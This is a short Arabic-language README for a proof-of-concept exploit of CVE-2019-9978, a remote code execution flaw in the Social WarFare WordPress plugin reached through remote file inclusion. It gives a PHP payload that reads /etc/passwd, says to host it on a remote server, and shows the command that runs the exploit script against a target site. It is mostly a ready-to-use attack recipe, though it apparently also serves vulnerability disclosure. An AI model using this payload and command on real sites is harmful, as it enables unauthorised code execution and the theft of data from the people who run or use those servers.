
CVE-2019-9978 - (PoC) RCE في إضافة Social WarFare (<=3.5.2)
CVE-2019-9978 - (PoC) RCE في إضافة Social WarFare (<=3.5.2)
تم اكتشاف تنفيذ تعليمات برمجية عن بُعد غير مصدق عليه في وظيفة معالجة استيراد الإعدادات. يمكن للمستخدم استغلال RFI للوصول إلى RCE.
انسخ الحمولة التالية:
<pre>system('cat /etc/passwd')</pre>
احفظها باسم الملف: payload.txt ثم ارفعها على خادم. يجب أن يبدو الرابط على الشكل: http(s)://yoursite.com/payload.txt. أخيرًا، زود الخيارين --target و --payload-uri:
$ python cve-2019-9978.py --target http://vulntarget.com \
--payload-uri http://yourpayloadsite.com/payload.txt

الباحث: Luka Sikic
الرابط: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
المؤلف: @hash3liZer